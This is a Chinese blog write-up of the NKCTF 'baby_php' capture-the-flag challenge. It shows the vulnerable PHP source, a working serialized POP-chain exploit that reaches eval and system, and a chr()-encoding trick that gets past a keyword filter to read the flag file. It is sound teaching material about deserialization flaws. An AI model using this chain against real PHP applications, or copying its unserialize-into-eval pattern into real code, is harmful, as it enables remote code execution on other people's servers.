nkctf——baby_php

最新推荐文章于 2024-07-17 12:52:39 发布
最新推荐文章于 2024-07-17 12:52:39 发布
阅读量274 收藏 1
点赞数
文章标签: php 开发语言 web 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/130069578
版权

目录

 题目

wp

popchain

思路

cmd的利用

strtolower

show_source

 

 题目

 <baby_php?php
    error_reporting(0);
    class Welcome{
        public $name;
        public $arg = 'oww!man!!';
        public function __construct(){
            $this->name = 'ItS SO CREAZY';
        }
        public function __destruct(){
            if($this->name == 'welcome_to_NKCTF'){
                echo $this->arg;
            }
        }
    }

    function waf($string){
        if(preg_match('/f|l|a|g|\*|\?/i', $string)){
            die("you are bad");
        }
    }
    class Happy{
        public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            waf($cmd);
            eval($shell($cmd));
        }
    }
    class Hell0{
        public $func;
        public function __toString(){
            $function = $this->func;
            $function();
        }
    }

    if(isset($_GET['p'])){
        unserialize($_GET['p']);
    }else{
        highlight_file(__FILE__);
    }
?>

wp

<?php
error_reporting(0);
class Welcome{
    public $name;
    public $arg;
}
class Happy{
    public $shell;
    public $cmd;
}
class Hell0{
    public $func;
}
$t=new Welcome();
$t->name="welcome_to_NKCTF";
$t->arg=new Hell0();
$t->arg->func=new Happy();
$t->arg->func->shell="system";
$t->arg->func->cmd="dir /";
echo serialize($t);

popchain

Welcome::__destruct->Hell0::__toString->Happy::__invoke

要利用eval >> Happy::__invoke() >> Hell0:__toString >> Welcome::__destruct

思路

用到eval函数,要触发Happy::__invoke(),即用一个函数调用Happy,发现Hell0中有一个function(),则可以func=new Happy()要触发__toString,可以用到Welcome中的echo,但是要name == 'welcome_to_NKCTF' ,则可以先new Welcome,触发__construct(),再使name == 'welcome_to_NKCTF'

cmd的利用

 

public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            waf($cmd);
            eval($shell($cmd));
            

function waf($string){
        if(preg_match('/f|l|a|g|\*|\?/i', $string)){
            die("you are bad");
        }
    }

cmd绕过preg_match('/f|l|a|g|\*|\?/i', $string)利用chr函数

$t->arg->func->shell="strtolower";

即$t->arg->func->cmd="show_source(chr(47).chr(102).chr(49).chr(97).chr(103));";

 eval(strtolower(show_source(/f1ag);)

 eval(strtolower(show_source(chr(47).chr(102).chr(49).chr(97).chr(103));)

 

strtolower

strtolower() 函数把字符串转换为小写

show_source

show_source() 函数对文件进行语法高亮显示

本函数是 highlight_file() 的别名

_MOB_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
记一道CTF题babyphp学习代码注入
xiaotaode2012的专栏
08-18 5330
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
baby_android_resource
09-13
baby_android_resource
NKCTF baby_php wp
Elite的博客
03-31 323
我们需要打开f1ag文件,获取flag,查看当前目录的话,会发现一个叫做ooo.txt的文件,里面放着根目录列表。经分析,所传入的$string字符串不能含有f l a g *?中的任何字符,并且不分大小写。ls指令无法使用,其中含有字符l,我们可以使用dir替代。也就是说所传入的内圈函数要绕过此正则。$cmd变量对应$string。
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 718
代码审计
babyphp(反序列化pop链,字符逃逸)
weixin_43610673的博客
02-28 1697
题目在BBUCTF有复现,但代码里dbuser,dbpass,database有修改https://buuoj.cn/challenges#[GYCTF2020]Easyphp 扫描目录发现www.zip源码泄露,下载审计 在Update.php看到 即登录成功就获取flag 看了下login.php,感觉登录框这里是做不了什么文章了 主要的内容都是在lib.php 根据Update.php里...
jarvis OJ web babyphp
qq_43677324的博客
04-02 1011
babyphp 考完二级后我又要回归web狗了 今天做到一道web题 上题: http://web.jarvisoj.com:32798/ 进入后: 发现应该有git泄露 因此我们使用githack进行获得源码 打开cmd 输入:python2 GitHack.py http://web.jarvisoj.com:32798/.git/ #这里的python2是我设置的用于区分python3 即这...
baby_repo:baby_repo
05-31
【标题】:“baby_repo:baby_repo” 【描述】:“baby_repo baby_repo” 根据提供的信息,我们可以推测这是一个关于Java编程的项目,名为“baby_repo”。虽然描述内容较为简洁,但通常一个以“repo”命名的项目...
baby_reverse.zip
09-24
【标题】"baby_reverse.zip" 是一个压缩文件,通常用于存储和传输一组相关文件。在这个特定的案例中,我们可以推测这个压缩包可能包含了与某个IT挑战或编程练习相关的资源。 【描述】"baby_reverse.zip" 的描述为空...
shanghai2018_baby_arm
06-03
arm64架构的pwn题
my_baby_diary_app
03-06
docker-laravel-handson
WgpSec CTF baby php wp
为之的博客
05-16 2011
打开页面就是源码,,代码审计啊 其意思是, 1.至少设置一个get或post且key为flag 2.其value不能等于flag 3.post遍历,但是是 $$key,也就是变量覆盖 4.get遍历,不过key和value都是双$ 5.输出flag 这里最关键的就是双$也就是变量覆盖了, 因为key必须为flag,对于post来说,你传的value都会赋值给$flag 但对于get来说,你传的value还必须有值。 最后输出$flag的值,如果想获取到flag,那么其值必须不..
NKCTF-2023-RE-Baby_rust
qq_54894802的博客
03-31 578
简单的rust逆向
2022 安询杯 Babyphp
m0_64815693的博客
11-30 2289
第五届 安询杯 Babyphp
极客巅峰 2020 babyphp2(phar反序列化)
y0un9er
10-02 720
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 1866
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
ctfshow—babyweb wp
cosmoslin的博客
11-10 969
web 1 baby_captcha 首先进入界面,可以知道账号是admin,点击“无脑”进入github链接,里面放了一些弱密码。 点击登录进入登录界面,发现验证码是音频文件,所以我们需要绕过验证码。填入信息后抓包。 这里我们发现验证码应该是无条件不刷新。 无条件不刷新是指在某一时间段内,无论登录失败多少次,只要不刷新页面,就可以无限次的使用同一个验证码来对一个或多个用户帐号进行暴力猜解。换句话说,攻击者可以在同一个会话下,在获得第一个验证码后,后面不再主动触发验证码生成页面,并且一直使用第一个验证码就
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1074
NKCTF WP
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 221
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
sigd的博客
07-16 500
小欧吃苹果,拓扑排序处理贪心问题。
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值